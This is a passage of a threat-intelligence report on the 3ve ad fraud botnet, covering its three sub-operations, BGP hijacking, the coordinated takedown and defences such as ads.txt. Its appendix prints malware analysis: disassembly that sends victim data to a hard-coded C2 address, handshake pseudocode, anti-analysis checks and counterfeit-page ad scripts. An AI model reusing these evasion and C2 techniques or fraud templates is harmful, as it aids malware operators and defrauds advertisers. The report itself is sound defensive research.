publisher inventory.
6. The Hunt for 3ve 6
3ve in a nutshell
3ve used a variety of techniques that made it more difficult to identify and analyze.
Peak metrics, including ad traffic volumes and other volumes observed over the course of 3ve’s investigation.
To protect itself against ad fraud, the industry relies
on third party verification solutions like White Ops and
in-house defenses like those implemented by Google.
Collectively, our teams have seen a wide range of botnet
schemes, ad fraud tactics, and invalid activity.
This knowledge and expertise helped us perform a deeper
investigation into 3ve, connect all of its disparate
sub-operations and components to a larger infrastructure,
and reveal how sophisticated and well-organized these
operation were.
Daily bid requests
Accounts selling ad inventory
3b+
60k+
Compromised IPs
Websites counterfeited
1m
10k+
Active infections at a time
Data center nodes
700k
1k+
Operation summary
Advanced techniques used to avoid detection
Mimicking human behaviors including mouse movements, faked clicks, etc.
Tag evasion
Ability to quickly regenerate residential IP addresses
Malware anti-forensics
No single point of failure (e.g., fixed IP list)
7. The Hunt for 3ve 7
Discovery and history
A low-level botnet quickly evolves
We first noticed the beginnings of what would later become
3ve while our two companies were assessing the impact
of the Methbot operation, a similar underground ad fraud
enterprise that White Ops revealed in 2016. At this early
stage of 3ve’s growth, it appeared to be a low-volume
bot operation conducting ad fraud through residential
computers infected with an unknown malware. Far from
being groundbreaking, it looked like a run-of-the-mill
malicious bot with minimal impact on the industry at large.
But 3ve’s activity grew in 2017, with its operation eventually
generating billions of daily ad bid requests. That spike in
activity prompted our two companies to begin collaborating
in investigating the malware being used by this newly
prominent fraud enterprise. We estimate that 3ve generated
between 3 billion and 12 billion or more daily ad bid requests
at its peak.
The lower bound (3 billion) is a conservative estimate based
on how many ad bid requests a single buying platform may
have received. This approach may underestimate the total
volume of ad bid requests generated by 3ve, because each
individual buying platform may not have received all ad
bid requests (e.g. one DSP may not have had a business
relationship with all available supply partners or a DSP
may only have received portions of available inventory
from some supply partners). When measuring 3ve’s ad
bid volume across the supply chain (and not only within
a single buying platform) we estimate that the ad bid
volume exceeded 12 billion daily ad bid requests. It should
be noted that our analysis of ad bid requests indicated
growth in activity, but not necessarily growth in transactions
that would result in charges to advertisers. It is also worth
noting that 3-12 billion is a small percentage of overall bid
request volume across the industry
Our knowledge and collaboration expanded
Although we were able to identify the traffic from the
operation, our visibility into its full capabilities was limited
until we discovered malware samples that matched what
we’d seen from 3ve’s bots. This led us to two malware
families: Boaxxe/Miuref and Kovter.
We gathered malware samples from fellow fraud
researchers at Proofpoint and Malwarebytes, but each
time we tried to run them on our own computers, they
wouldn’t work. After some deep collaboration with
ProofPoint and Malwarebytes, we discovered that this
was because the malware was using anti-forensics, an
evasion tactic in which malware scans a computer’s
processes, hardware, username, and IP address for any
security software that might detect it before running on
that computer. The malware was also only receiving and
executing ad fraud instructions on computers with certain
ISPs and in specific geographical locations. Subsequently,
we were able to observe and gradually understand 3ve’s
inner workings. That process progressively revealed the
presence of more malware and botnet families being
used by 3ve.
We started referring to the bot operation as 3ve because our
analysis suggested that it was composed of three distinct
sub-operations, all of which shared certain similarities,
but were specifically designed to commit different kinds
of ad fraud. We observed the network using tactics like
We estimate that 3ve generated between
3 billion and 12 billion or more daily ad bid
requests at its peak.
We started referring to the bot operation as
3ve because our analysis suggested that it
was composed of three distinct sub-operations,
all of which shared certain similarities, but
which were specifically designed to commit
different kinds of ad fraud.
8. The Hunt for 3ve 8
tag manipulation and suppression to cover its tracks, and
noticed that it had started to quickly change its codebase
after each spike in its activity.
The actors responsible for the three sub-operations of
3ve demonstrated a high level of sophistication, creativity,
and agility. In response, we needed to figure out a way to
permanently disable it or shut it down.
One way to bring down bot operations is to blacklist all
of their known IP addresses. However, because of the
operation’s aggressiveness, as well as its ability to rapidly
acquire new IP addresses, we realized that a blacklist
would only temporarily interrupt 3ve’s activity. To take it
down permanently, we needed to understand how 3ve
was structured and organized, we had to ensure that the
operators thought they were going unnoticed in order to
observe them and apply our learnings to future security
efforts, and we needed to expand our effort beyond
Google and White Ops.
As 3ve’s perpetrators were building the infrastructure
behind their operations, we secretly started building
a coalition of partners working to stop them. Over the
following weeks and months, White Ops, Google,
and various other industry participants together to
dismantle 3ve.
A typical ad fraud operation tries to keep its profit model simple, targeting only one aspect of the digital advertising
ecosystem. For example, fraudsters will commonly create and sell bot traffic to unsuspecting publishers looking to
get more eyes on their content. At least two of the three 3ve sub-operations used such tactics and also added another
common approach: selling counterfeit ad inventory featuring the domains of popular websites “spoofed” by 3ve’s
operators. Domain spoofing is designed to fool advertisers into thinking that an impression of their ad was served on
a premium publisher site, like that of a noteworthy newspaper (and not on an empty website designed for bot traffic).
The 3ve operation
An example counterfeit site shows a low-quality web page with a video ad and links below.
We had to ensure that the operators thought
they were going unnoticed in order to
observe them and apply our learnings to
future security efforts.
• Watch More Funny Movies on FilmPhile
• Watch Live TV on FilmPhile
• Closed Captioning
• American Sis - Sibling Rivalry - FilmPhile
• Watch This Season’s Comedy on FilmPhile
• Here’s What Happened on American Sis - The Secret Society of Super Sisters - FilmPhile
• Turned - All Is Not Gone - FIlmPhile
• CD League - Semifinals/Grand Final - FilmPhile
• Search
• Help
9. The Hunt for 3ve 9
But this describes only the basic premise behind what is actually a set of three distinct sub-operations, each taking
unique measures to avoid detection, and each built around different architectures using different components. Like a fully
professional software company, 3ve’s operators had the ability to A/B test different approaches, as well as different parts
of the bot operation, in order to insulate themselves from the fallout if one part was somehow cut off or shut down.
Although the degree of complexity varied among the three sub-operations, all three demonstrated highly advanced
behaviors, including the impersonation of real human users, tag evasion, and sophisticated malware-based anti-forensics.
General
Description
Monetization
Approach
Data center based
bot with botnet and
hijacked IPs
Botnet based
counterfeit ad fraud
Data center bot
3ve.1 3ve.2 3ve.3
Mostly counterfeit
inventory (including
counterfeiting mApp)
with fake pages and
apps hosted in data
centers. Indication of
some traffic selling.
Mostly counterfeit
inventory with fake
pages hosted in data
centers. Indication of
some traffic selling.
Indications of traffic
selling, and unable to
determine if they also
create counterfeit
inventory.
The residential IPs
of botnet infected
computers or from
BGP hijacked IPs
The residential IPs
of botnet infected
computers
Data center IPs
Ad Request
IP Address
Overall 3ve operations
10. The Hunt for 3ve 10
When combined, the three 3ve sub-operations constituted one of the most widespread ad fraud operations ever uncovered.
One of the three sub-operations included one of the larger active botnets, with up to 700,000 active desktop infections at
any given time. One of the other 3ve sub-operations was by itself similar in size and scope to the Methbot operation of 2016,
which was likely the largest known ad fraud operation at that time.
All told, 3ve controlled over 1 million IPs from both residential botnet infections and corporate IP spaces (as noted above,
there were up to 700,000 active infections at any given time). In aggregate, the operation also produced more than 10,000
counterfeit domains, and generated over 3 billion daily bid requests at its peak. We estimate that portions of the bot
operation spanned over 1,000 servers in data centers allocated to various functions needed for this type of large-scale
operation.
Despite 3ve’s scale and aggressive growth, we worked proactively to deploy countermeasures in order to protect customers
and to diminish the chances that 3ve’s operators could benefit from their activities. Our collective experience in combating ad
fraud enabled us to establish a variety of defenses against 3ve, while we worked in parallel to dismantle it.
The sections below provide a brief overview of all three 3ve operations (called 3ve.1, 3ve.2, and 3ve.3 for the sake of clarity),
breaking down how each was structured to circumvent bot detection and blocking measures in order to siphon as much ad
budget as possible. Expanded details and context for the sub-operations are included in the Appendix.
1,000+
An overview of the broader 3ve operation
Everyday People
Create real ad space by
visiting real web pages.
Real Human Traffic Progammatic Supply Chain
Fake or Non-Human Traffic 01 01 01
3ve Botnets
Open thousands of web
browsers, disguise traffic, and
visit fake and real web pages.
Demand Side Platforms
Submit bids on behalf
of advertisers to
purchase ad space.
Supply Side Platforms
Sell ad space to
Demand Side Platforms
in real time.
Ad Fraud Operator
Uploads instructions
to 3ve botnets.
Real and fake web pages
create ad space that
is sold in programmatic
supply chain.
Advertisers
Win auctions to deliver
ads on webpages.
Ad Networks
Sell ad space to
Demand Side Platforms
and directly to advertisers.
11. The Hunt for 3ve 11
3ve.1 architecture
3ve.1
The first of 3ve’s three ad fraud sub-operations, 3ve.1, was powered by a network of bots all operating in a few data centers
across the US and Europe. Normally, bot operations like these are very easy to detect — if you see a lot of traffic for an ad
coming from the same IP address, you know you’re dealing with a bot farm. But this operation cleverly used compromised IP
addresses as a proxy, making it seem as though its ad requests were coming from computers in homes and businesses in
sought-after markets. While many of these IP addresses were acquired via a malware called Miuref or Boaxxe, others were
obtained using a procedure called Border Gateway Protocol (BGP) hijacking. The hackers essentially seized huge swaths of
corporate and residential IP space by interfering directly with the main Internet routing protocol.
All the fake ad requests from 3ve.1 initially pretended to be from desktop browsers, but this changed over time, with the
operation increasingly relying on spoofed mobile traffic. This was done by the data center-based browsers pretending to be
Android devices. There were two unique, active mobile misrepresentation schemes: in one the ad requests were spoofed
to look like they came from mobile apps, in the other the ad requests were spoofed to look like they came from mobile
browsers. The spoofing was achieved by overriding the parameters typically used to determine what type of device the
traffic came from.
Ad fraud operator writes
instructions and uploads it
to their data center botnet.
The data center computers
open thousands of web
browsers and contact a
command and control relay.
The command and control relays
direct the data center browsers
to proxy their traffic through
infected devices or hijacked IPs
and visit fake and real web pages.
1,000+
Those fake web pages generate
ad requests to receive ads from
the programmatic supply chain.
12. The Hunt for 3ve 12
3ve.2 architecture
3ve.2
Comparable to 3ve.1, 3ve.2 also used counterfeit domains to sell fake ad inventory to advertisers. But instead of relying on
proxies to hide its activities, 3ve.2 used a custom-built browsing engine installed with the Kovter botnet, which had infected
hundreds of thousands of computers through malvertising campaigns (malvertising is the use of digital ads to distribute
malware). This operation had similarities with 3ve.1 (although 3ve.2 was superior in its level of sophistication) that initially
led us to believe they might be variants of each other, but later research suggested they were distinct, but connected
sub-operations. Recent evaluations of the Kovter botnet have put it at approximately 700,000 user computers and IP
addresses. 3ve.2 made use of redirection servers that instructed the infected computers to visit specific fake web pages.
Kovter infected computers
receive instructions
from command and
control server.
Infected computer opens
hidden browsers and visits
a fake web page (via
a redirect server).
Fraud Operator sends
instructions to command
and control server.
Web pages generate ad
requests to receive ads
from the programmatic
supply chain.
13. The Hunt for 3ve 13
3ve.3
The third 3ve-associated sub-operation was similar to the others in that it registered its ad fraud bot networks under
different IP addresses in order to hide their activity. Like 3ve.1, 3ve.3’s bots were based in a few data centers, but it used
the IP addresses of other data centers instead of residential computers to cover its tracks. Again, data centers are far
more suspicious to advertisers worried about bot traffic, but 3ve.3’s strategy still allowed its operators a good degree of
agility by allowing them to find new data centers as soon as old data centers were blocked. Although easier to detect, this
approach allowed them to commit ad fraud more efficiently — data centers can offer greater bandwidth than hundreds
of thousands of residential computers.
3ve.3 architecture
Ad Fraud operator
writes instructions
and uploads it to their
data center botnet.
The data center computers
open thousands of web
browsers and contact a
command and control relay.
The command and control relays
direct the data center browsers
to proxy their traffic through data
center IPs and visit fake and real
web pages.
Those fake web pages
generate ad requests to
receive ads from
the programmatic
supply chain.
1,000+
14. The Hunt for 3ve 14
Taking 3ve down
With each detail we uncovered about 3ve and its inner
workings, it became clearer that a typical blacklisting
effort would only cause portions of the operation to
momentarily go offline, giving 3ve’s operators a chance
to reset a short time later.
3ve’s sheer size and complexity posed a significant risk
not just to individual advertisers and publishers, but to
the entire advertising ecosystem. We had to shut the
operation down for good, which called for greater, more
calculated measures. To that end, it was critical that
we played the long game, endeavoring to have a more
permanent, more powerful impact against this and
future ad fraud operations.
To dismantle 3ve and prevent its return, collaboration
was needed from major partners across the digital media
space, from web publishers to anti-virus companies.
Although a technical takedown was necessary, historically
technical measures alone have not always been sufficient
to prevent a recurrence in the past. A takedown combined
with prosecution would more fully disrupt the criminal
organization and serve as a deterrent to similar activity by
other actors. Taking this approach meant spending time
collectively researching and investigating the operation,
allowing us to map out its infrastructure, its monetization
strategy, and its major components.
The industry working group
It was this conclusion that prompted the creation of the
industry working group, which included a variety of
stakeholders including White Ops, Google, 15 other major
industry parties, and members of the information security
community. This working group used the diverse expertise
of its various partners to analyze and understand 3ve.
One of the working group’s main goals was collaborative
intelligence. The working group spent months observing
3ve’s activities, working to build an invaluable technical
approach to identifying and defending against similar
threats in the future.
The success of the working group can largely be credited to
the wide range of perspectives and skill sets represented by
its participants.The diversevantage pointsand indispensable
insights of key ad tech companies and several ISPs were
instrumental in understanding 3ve’s impact, while anti-virus
specialists worked to understand the malware that was
written and installed onto residential computers as a way to
provide cover for the botnet’s data centers.
Our investigation and analysis of 3ve was expedited by this
cross-functional collaboration with industry partners.
Indication of a successful takedown
A coordinated takedown of infrastructure related to 3ve’s
operations occurred recently. The takedown involved
disrupting as much of the related infrastructure as possible
to make it hard to rebuild any of 3ve’s operations. Technical
takedowns like these require detailed understanding of
the internal aspects of the fraud operations and extensive
collaboration across many companies from various parts
of the industry. As the graph below demonstrates, declining
volumes in invalid traffic indicate that the disruption of
infrastructure thus far has been successful, bringing the
bid request traffic close to zero within 18 hours of starting
the coordinated takedown. Our sincere gratitude and
appreciation to everyone involved with this takedown effort.
The working group spent months observing
3ve’s activities, working to build an invaluable
technical approach to identifying and defending
against similar threats in the future.
15. The Hunt for 3ve 15
Incoming 3ve.2 bid requests (via OpenRTB protocol)
Uniting the industry against future attacks
Whenever a major ad fraud operation like this is uncovered, it serves as a wake-up call to those involved in digital
advertising. Not only is it necessary to reinforce traditional guards against ad fraud, but three critical tactics need to be
adopted to account for the rapidly evolving capabilities of automated threats like 3ve.
1. Create and adopt industry standards like ads.txt — The industry is working on new tools to protect itself from ad
fraud. Ads.txt was created by the IAB Tech Lab to help prevent domain spoofing by allowing publishers to create public
files of “Authorized Digital Sellers.” These files make it easy to see which parties are authorized to sell that publisher’s
ad inventory. Adoption of ads.txt has been very strong: to date over 500,000 domains have published
ads.txt files. As more sell- and buy-side platforms continue to roll out their enforcement and advertisers opt to only
buy inventory from domains with ads.txt files, the potential for fraudsters to profit from selling counterfeit inventory
will be minimized.
2. Be mindful and proactive about ad fraud — There are a number of heuristics that advertisers can use to ensure
that whatever ad fraud solution they have in place is working. One good rule of thumb: if it seems too good to be
true, it probably is. That means if you start implementing an anti-fraud solution that decreases your fraud rate, but
doesn’t cause your CTR to drop with it, it’s likely that your solution isn’t quite working correctly. Similarly, your ad
fraud rate should be changing over time, as there is inherent variability in traffic volumes.
3. Use a layered methodology for fighting ad fraud — Much of our experience with 3ve demonstrates just how good
bots have become at imitating human users. Advertisers and publishers should therefore take a layered approach
to bot traffic and ad fraud detection, using both in-house defenses and third-party verification to look for all the
indicators of bot-controlled computers.
BidRequests
Time
12:00 AM 12:00 PM 12:00 PM12:00 AM12:00 PM 12:00 AM
16. The Hunt for 3ve 16
ads.txt status for recent 3ve traffic
To give a concrete example of the value of industry collaboration, consider the ads.txt status for 3ve’s traffic. As shown
in the graph below, more than 80% of the incoming ad bid requests that 3ve generated in early 2018 were unauthorized
(‘unauthorized’ in this context means that the bid requests were offered for sale by sellers that were not listed as authorized
sellers in a domain’s ads.txt file) . If all ad tech companies and advertisers enforced ads.txt and stopped buying or selling
unauthorized inventory, over 80% of all 3ve inventory would be completely blocked across the entire industry..
3ve’s takedown represents two important milestones for the digital advertising industry: First, it demonstrates the power of
industry collaboration in confronting sophisticated ad fraud operations. Second, that law enforcement action sends a clear
message that committing ad fraud can have significant consequences, which is likely to discourage would-be cybercriminals.
Curtailing ad fraud is not only good for the digital advertising ecosystem, but also the billions of people who rely on the
Internet to be a safe place where they can access services and information that add value to their lives. We believe that both
the intelligence we’ve gained from 3ve, and subsequent law enforcement action, should make it riskier and harder for similar
operations to profit in the future.
ads.txt status for 3ve traffic
8.6% Authorized (Direct)
11% Authorized (Indirect)
80.3% Unauthorized
17. The Hunt for 3ve 17
Appendix
We’ve included the sections below to expand on the details and context provided for 3ve’s three sub-operations in
the main body of this document.
3ve.1
The first of 3ve’s three ad fraud sub-operations, 3ve.1,
was a hybrid operation, and was itself composed of three
main layers: an army of bots in multiple European data
centers, a layer of exit nodes (the IP addresses that the
ad requests appear to originate from) comprised of
malware-infected user computers or stolen corporate IP
space, and a command and control (C2) layer that directed
the malware and ad fraud bots on every transaction.
This sub-operation was primarily focused on video fraud,
selling counterfeit video inventory to advertisers on
counterfeited domains.
This layered architecture allowed the operators to keep
their bot software isolated, proxying all activity through
both infected user computers and through IP space stolen
from corporations via Border Gateway Protocol (BGP)
hijacks. Acquiring IP addresses this way is significant
because it constitutes a particularly blatant form of fraud,
used to corrupt large groups of IPs by interfering directly
with an exterior routing protocol. If one of these stolen
IP addresses was detected as the source of fraudulent
activity, it was easily burned and recycled, while the same
bots continued running in the data centers behind it. The
operation’s ability to continuously find new IPs through
which to proxy gave it a layer of protection and isolation,
avoiding any “single point of failure” that could allow us
to easily eradicate it.
The ad fraud bot operation was comprised of Miuref/Boaxxe
infected-computers. This bot farm largely relied on Chrome
and Internet Explorer. While the number of IPs hijacked from
corporations ranged from 200,000 to 500,000 at any given
time, the malware infection footprint appears to have
remained at less than 5,000 infections across the globe.
Operating as a proxy in user’s PCs
Whenever the 3ve.1 binary was executed, it would start
collecting specific information about the PC on which it
was running. Among other things, the binary would read
the Computer Name, Volume Serial Number, Machine GUID,
the full path of the running process (in this case, c:test
eve.exe), and time zone. Then, it would build a hash table
of known programs that are typically used by analysts.
Finally, it used the typical CreateToolhelp32Snapshot/
Process32NextW to enumerate all running processes
and cross-reference them with the hash table.
3ve.1’s binary did the same thing with device drivers,
checking for the presence of VMs, remote access
software (LogMeIn), CD-ROM type, etc. If anything went
wrong, it would sleep forever without executing any
fraud-like requests. While running all these checks, it
would also copy itself to other locations and drop a new
binary file into C:Users...AppDataLocal
VirtualStorelsass.aaa.
All this information would be appended to a big string, which
was RSA-encrypted (with a hard-coded key) and sent to the
server. To be clear, the first message included both the user
info and the RC4 key, and was encrypted with an RSA public
key. If the C2 confirmed that it was safe to start executing
commands, the following messages would be quickly
encrypted with RC4 using the previously generated RC4 key.
18. The Hunt for 3ve 18
Message sent and encrypted for 3ve.1 to start executing commands.
3ve.1 messages before and after encryption and encoding.
pn:C:Testeve.exe
un:davidcopperfield
cn:DESKTOP-1Z8V3O1
cpu:1,1,Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz
sk: uwomanrx (RC4 Key used for future communication)
Before encryption
After encryption
and encoding
ƒÑ]8γ ☻ ╬á♦í
u : x x x x x x x x x 6 4 a 7
2 2 0 5 4 c 8 c 2 8 8 8 e f 9 3
b b ◙o : 6 . 2 . 9 2 0 0 ◙b :
6 4 ◙a : 0 ◙c : 1 ◙v: 1 0 0
◙s : 0 ◙r : 1 ◙1 : 2 0 0 0 ◙
d : 1 2 ◙n : 5 ◙c p : 1 0 ◙c
r : f 0 5 4 6 e 2 8 ◙b t : 1 d
2 2 5 e c . f 1 c 7 f a 1 0 ◙p
n : C : T e s t e v e . e x
e ◙u n : m X X X X X a c o c n
: D E S K T O P - 1 X X X X 0 1
◙c p u : 1 , 1 , I n t e l ( R
) Core (TM) i7-66
00U CPU @2.60GH
z◙½½½½½½½½
↓ FRO -------
N E p 9 3 E 3 S h q S V b I k H
% 2 b g C Q t n G 8 K 4 8 b J w
K 0 g Q T l g f 2 G m 6 V u q N
5 O E k 4 4 M q J 5 L F u x k s
6 m i r o c I Q p h D 9 9 8 V p
W H u 8 H W 1 C 5 3 y M 2 O 1 O
o R m w t 3 6 G i 7 h q Z e 3 Y
F b I v u X J W o r s W o y F %
2 f u U u s 7 D c n J N a s Y 1
S k v 8 B n B u f p h v W 1 c O
O K v 8 m W d V L G Y 6 Q 0 z 7
3 f h W z i 4 4 r K y J I d x d
d a k d A h i W U % 2 b v E m j
e r y z Y L V O L i J A 0 3 % 2
f k J G N 5 1 G v B D T r n 0 4
MYnpx4rxLpXkw9nb
↓ FRO -------
19. The Hunt for 3ve 19
The above CoCreateInstance would instantiate the Internet.Explorer CLSID {0002DF01-0000-0000-C000-
000000000046}, spawning a windowless iexplore.exe process, then would use its Navigate2 method to send the
encrypted PC data to their C2 server.
We were able to easily pinpoint the instantiated COM by searching the CLSID in the registry. The search returned quickly,
showing us that it belonged to Internet Explorer.
; CODE XREF: Create_InternetExplorer_COM=15↑j
push edi ; pvReserved
call ds:CoInitialize
lea eax, [edp+ppv]
push eax ; ppv
push offset riid ; riid
push 4 ; dwC1sContext
push edi ; pUnkOuter
push offest rclsid_Internet_Explorer ; rclsid
call ds:CoCreateInstance
[...]
call dword ptr [ecx+OD Oh] ; iexplore.Navigate2
mov esi, ds:GetTickCount
call esi ; GeTickCount
mov [edp+psz], eax
Instantiated COM registry location within Internet Explorer
Network communication
3ve.1 used three different sets of APIs to communicate with its C2 servers. The first request was done by
instantiating an Internet.Explorer COM Application and using its Navigate2 method to generate a GET request
to http://185.118.67.195 (the IP was hard-coded and encrypted inside the binary).
CoCreateInstance that instantiated the Internet.Explorer CLSID and spawn a windowless iexplore.exe process.
Internet.Explorer.Application Registry Key
Instantiates Internet.Explorer.Application and Navigates
20. The Hunt for 3ve 20
Right after the Navigate2, 3ve.1 used the Wininet API [ InternetConnectA / HttpSendRequestA ] to do the same request
from its own process. However, at this stage, it would set different flags using the InternetSetOptionA — this was probably
a measure used to bypass the local proxy. All these wininet calls were not visible in the PE import table because they were
loaded at runtime via kernel32.dll LoadLibrary/GetProcAddress.
The communication from this point on would be channeled exclusively through the low-level Windows Sockets 2 API.
This both gave 3ve.1’s operators more control and bypassed the local proxy.
3ve.1 C2 handshake
The binary had several hard-coded (but encrypted) hostnames inside. For example, there was an array of servers named
[d].winsrw.com where the first digit would change from 1 to 5. Once the malware was sure it had Internet access (by
sending a couple of requests to microsoft.com), it would get the IPs of those servers using the gethostbyname function.
Finally, it would connect to them using the Windows socket API.
Then, 3ve.1 would send the same user/PC information to one of the winsrw.com servers, expecting to receive an “OK.”
But the server is pretty selective, and checks several things before accepting: for example, Windows language/locale
information should be English, and the IP must be in the US range.
The pseudocode below describes better how this works — just keep in mind that both the request and response
are always encrypted.
As described above, the C2 replies back an OK if the user information matches what they consider a valid PC and
if the IP is in the US.
Client (Malware)
Socket->Connect(Get_IP(2.winsrw.com))
Repeat Every 30”
Socket->Send(PC_INFO)
If (Response == “OK”)
Start_Ad_Fraud (and stop checking every 30”)
Server (C2 from *.winsrw.com)
If (PC_INFO == REAL_PC AND IP_LOCATION == US)
Response->”OK”
Response->MORE_COMMANDS
Else
NO_REPLY
Pseudocode describing 3ve.1’s C2 handshake
21. The Hunt for 3ve 21
BGP hijacking
The Internet is composed of many independent networks (referred to as “Autonomous Systems,” or ASs, each assigned a
unique identifier called an ASN), all tied together via something called “Border Gateway Protocol” or (BGP). Through BGP,
these networks are able to build a globally shared “routing table” that allows them to easily determine how any one IP
address can connect to any other. The problem is that BGP was designed during a more innocent time for the Internet,
when it was small and everybody trusted each other. While some improvements to security have been made over the
years, it still primarily relies on trust — and the implied threat of being cut off if one misbehaves. But people who attempt
to game this system won’t be cut off if no one notices or cares about their misconduct, and there are still a lot of unused
and forgotten IP addresses out there that criminals might use to mask unscrupulous activity. This presents an opportunity
for bad actors to do something known as “BGP hijacking.” One group of such actors came to our attention in early 2017.
The BGP hijacking operation used by 3ve had been set up long before we started seeing it used for fraud on a non-trivial
scale. Historical routing data shows the core AS “ALPHA” used in the beginning of the operation came online in 2013,
while the low-volume, low-sophistication bot activity White Ops has seen only dates back to 2015. The routing setup
was simple: just the core ALPHA AS and a few directly attached networks, connected via a single transit provider. We are
uncertain whether the IP space they were using was legitimately obtained or not, but the goal of phase 1 seems to have
been to establish some history for ALPHA before it started doing shady things.
Initial 3ve.1 BGP hijacking operation structure
In early March of 2017, ALPHA began to abuse its position of trust within BGP. They chose defunct ASs that had been
inactive for quite some time and set them up behind their own AS. IP addresses were required to make this useful, so they
found some IP networks that weren’t being used and began advertising them from the defunct (now zombie) ASs.
ALPHA was very careful about which entities it decided to impersonate — many still had functional (though badly out of date)
websites. In many cases, ALPHA chose ASs formerly used by Internet service or hosting providers, along with IPs used by
companies that were from the same geographic region.
The next stage of evolution came in late August. AS BRAVO came online (also in Eastern Europe), which had several transit
providers, including the one serving AS ALPHA, connecting it to the Internet. This made it more resilient in case any of its
transit providers were to bring down the hammer on its illegal activities. AS BRAVO used an even more complicated network
setup — it had several defunct ASs attached to it, each of which in turn had several more defunct ASs attached through
which to actually route IP addresses. This configuration made it look more like a legitimate network, and also increased
the rate of “churn” of ASs and IPs so that it could respond to blocks faster. Use of AS ALPHA was slowly phased out as AS
BRAVO ramped up.
IPs
IPs
IPs
Defunct ASN 3
Defunct ASN 2
Defunct ASN 1
IPs
IPs
IPs
TransitASN Alpha
22. The Hunt for 3ve 22
3ve.1 BGP hijacked IPs in current vs. ever in use
Later stage structure of 3ve.1’s BGP hijacking operation
ASN BRAVO
Live ASN
Defunct ASN 3
Defunct ASN 2
IPs
IPs
IPs
IPs
Defunct ASN 5
Live ASN
IPs
IPs
IPs
IPs
Defunct ASN 1
Current IPs Cumulative IPs
20,000,000
15,000,000
10,000,000
500,000
0
4/1/2017 7/1/2017 10/1/2017 1/1/2018
Transit
Spoofed
Connection
Spoofed
Connection
23. The Hunt for 3ve 23
Apparently frustrated by blocking, they began using a new technique, just in time for the end of 2017. Instead of relying only
on defunct ASs, they started impersonating live, legitimately used ones as well. This works because it is perfectly fine
for the same AS to have multiple “points of presence” on the Internet as long as it’s only advertising routing for some of
its IP addresses at each point. With this change, attempting to identify defunct ASs and block all their IPs would result
in collateral blocking. Further, phantom connections to well known transit providers were spoofed to further muddy the
waters for automated analysis. They even appeared to be providing transit to some legitimate networks. Despite all the
obfuscation, automated identification of this activity is still possible.
3ve.2
3ve.2 used malvertising and social engineering to infect approximately 700,000 Windows computers at any given time
— a truly significant reach for any cybercriminal operation. The actual infection chain has been documented in detail by
Kafeine and other Proofpoint staff. It is using social engineering to lure victims into downloading and executing fake Chrome,
Firefox, or Flash updates. The 3ve sub-operation removed the need for data center-based browser farms, instead embedding
the entire ad fraud component into malware executed by its victims’ infected computers. This approach greatly simplified
the botnet’s data center operation by pushing complexity into the malware. 3ve.2 is responsible for the majority of 3ve’s total
outbound network traffic.
Counterfeit websites
3ve.2’s main component was its browsing module, which was responsible for browsing counterfeit websites and
subsequently executing the ad fraud activity. These sites, hosted on servers in data centers, are templated sites
that mainly contain an ad space and its supporting ad libraries along with some scraped content from legitimate
websites. To execute the ad fraud, 3ve.2 instructed its browser-bot army to visit these counterfeit sites, loading them
in programmatically-driven browsers to generate artificial ad impressions. The ad fraud component was based on the
Chrome Embedded Framework (CEF), which the botnet’s authors heavily customized to better mimic a typical Chrome
instance. 3ve.2 hijacked domain name resolution (DNS) requests originating from the CEF, instructing the bot on the
victim’s machine to visit 3ve-controlled counterfeit websites instead of the original domains. Hijacking DNS resolution
for the CEF process keeps 3ve’s victims unaware of the malware on their computers. Since the DNS hijacking was
isolated to the CEF requests the user’s regular browsing activity remained unaffected.
We were able to identify three different sources of counterfeit websites (referenced as templates) that 3ve.2 visited. We
believe 3ve.2 was able to monetize capacity by counterfeiting benign websites. Below are screenshots and JavaScript
code snippets used to render the ads on each of those templates.
24. The Hunt for 3ve 24
3ve.2 Template A
The top screenshot below shows an anonymized example of an original website while the bottom screenshot is the
counterfeit equivalent for the same domain. The counterfeit page only includes a video ad and a few links below it.
Original website
Counterfeit website
• Watch More Funny Movies on FilmPhile
• Watch Live TV on FilmPhile
• Closed Captioning
• American Sis - Sibling Rivalry - FilmPhile
• Watch This Season’s Comedy on FilmPhile
• Here’s What Happened on American Sis - The Secret Society of Super Sisters - FilmPhile
• Turned - All Is Not Gone - FIlmPhile
• CD League - Semifinals/Grand Final - FilmPhile
• Search
• Help
25. The Hunt for 3ve 25
3ve.2 Template B
This HTML template is arbitrarily defining the size of the player based on the current time.
3ve.2 Template B code snippet
2 var resolutions = [
3 [1025,575],
4 [960,540],
5 [895,500],
6 [800,600],
7 [700,390]
8 ];
9 var date = new Date();
10 var item = date.getMinutes() % 5;
11 var width = resolutions[item][0];
12 var height = resolutions[item][1];
13 </script>
14 <div id=“ad_content”>
15 <div id=“jw7113”></div>
16 <div id=“banners”>
17 <script src=“XXX”></script>
18 <script language=“javascript1.1” src=“XXX”></script>
19 </div>
20 </div>
21 <script type=“text/javascript”>
22 var playerInstance = jwplayer(‘jw7113’);
23 playerInstance.setup({
24 file: ‘/movies.mp4’,
25 width: width,
26 height: height,
27 autostart: true,
28 primary: ‘flash’,
29 repeat: true,
30 controls:false,
31 advertising: {
32 client: ‘vast’,
33 tag: ‘XXX=’+width+height
34 }
35 });
26. The Hunt for 3ve 26
3ve.2 Template C code snippet
3ve.2 Template C
This template randomly decides where to place a video ad on the page by extracting arbitrary X, Y coordinates
from the page URL.
1 function xy_checksum(s,t){
2 var index;
3 if(t==1){var checksum = 12345678;}
4 if(t==2){var checksum = 00000000;s=s+s;}
5 for (index = 0; index < s.length; index++) {
6 checksum += (s.charCodeAt(index) * (index + 1)+t);
7 }
8 if(t==1){
9 while(checksum>50){
10 checksum=checksum-50;
11 }
12 return checksum+10;
13 }
14 if(t==2){
15 while(checksum>80){
16 checksum=checksum-80;
17 }
18 return checksum+10;
19 }
20 }
21 function place_player(pl){
22 pl.style.position = ‘absolute’;
23 pl.style.left=xy_checksum(window.top.location.href,1)+’%’;
24 pl.style.top=xy_checksum(window.top.location.href,2)+’%’;
25 }
26 try
27 {
28 ads_placer_work.add_ad_element(document.
getElementById(‘mainvd’),”video”,”576x344”);
29 } catch(e)
30 {
31 place_player(document.getElementById(‘mainvd’));
32 }
27. The Hunt for 3ve 27
Hidden Windows
3ve.2 used hidden windows on a hidden desktop to conceal its activity on an infected user’s machine. It’s common for
malware that needs to hide a window to use either hidden windows or a hidden desktop, but rarely both. The hidden
desktop was discovered while analyzing a memory dump.
This added a further level of obfuscation because Windows 7 does not support multiple desktops. The exception to this
type of setup is through the use of the Windows API. The legitimate use for this feature is creating a new desktop for
another user who wants to log in. We observed that when the malware created the new desktop, it didn’t create a new
instance of explorer.exe. This meant that an analyst wouldn’t be able to easily access their tools, because there wouldn’t
